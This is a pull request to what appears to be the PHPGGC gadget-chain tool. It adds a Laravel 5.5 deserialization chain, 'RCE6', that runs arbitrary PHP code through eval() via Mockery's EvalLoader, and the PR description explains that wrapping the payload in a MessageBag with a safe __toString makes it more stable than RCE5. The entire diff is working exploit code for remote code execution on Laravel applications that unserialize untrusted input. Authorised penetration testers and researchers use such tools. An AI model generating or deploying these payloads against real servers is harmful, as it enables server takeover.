### PR TITLE
More stable version of RC5

### DIFF
--- a/gadgetchains/Laravel/RCE/6/chain.php
+++ b/gadgetchains/Laravel/RCE/6/chain.php
@@ -1,0 +1,26 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE6 extends \PHPGGC\GadgetChain\RCE
+{
+    public static $version = '5.5.*';
+    public static $vector = '__destruct';
+    public static $author = 'Phith0n & holyvier';
+    public static $informations = '
+        Executes given PHP code through eval().
+        Requires Mockery, which is in the require-dev package. 
+    ';
+    public static $parameters = [
+    	'code'
+    ];
+
+    public function generate(array $parameters)
+    {
+    	$code = '<?php ' . $parameters['code'] . ' exit; ?>';
+        $expected = new \Illuminate\Broadcasting\PendingBroadcast($code);
+        $res = new \Illuminate\Support\MessageBag($expected);
+        return $res;
+
+    }
+}

--- a/gadgetchains/Laravel/RCE/6/gadgets.php
+++ b/gadgetchains/Laravel/RCE/6/gadgets.php
@@ -1,0 +1,66 @@
+<?php
+namespace Illuminate\Bus {
+    class Dispatcher {
+        protected $queueResolver;
+
+        function __construct()
+        {
+            $this->queueResolver = [new \Mockery\Loader\EvalLoader(), 'load'];
+        }
+    }
+}
+
+namespace Illuminate\Broadcasting {
+    class PendingBroadcast {
+        protected $events;
+        protected $event;
+
+        function __construct($evilCode)
+        {
+            $this->events = new \Illuminate\Bus\Dispatcher();
+            $this->event = new BroadcastEvent($evilCode);
+        }
+    }
+
+    class BroadcastEvent {
+        public $connection;
+
+        function __construct($evilCode)
+        {
+            $this->connection = new \Mockery\Generator\MockDefinition($evilCode);
+        }
+
+    }
+}
+
+namespace Illuminate\Support {
+        class MessageBag {
+                protected $messages = [];
+                protected $format;
+
+                function __construct($inner) {
+                        $this->format = $inner;
+                }
+        }
+}
+
+namespace Mockery\Loader {
+    class EvalLoader {}
+}
+
+namespace Mockery\Generator {
+    class MockDefinition {
+        protected $config;
+        protected $code;
+
+        function __construct($evilCode)
+        {
+            $this->code = $evilCode;
+            $this->config = new MockConfiguration();
+        }
+    }
+
+    class MockConfiguration {
+        protected $name = 'abcdefg';
+    }
+}


### PR DESCRIPTION
I've had some issue with the payload of Laravel/RCE5 in some cases. The core issue is that if the server does string operation with the deserialized payload, it will crash and cause the server to prematurely close the output buffer before "__destruct" is invoked. To avoid this problem, the new version wraps the payload in an objet that has a "__toString" that doesn't crash.

Is making a new gadget OK or should I update the existing one ?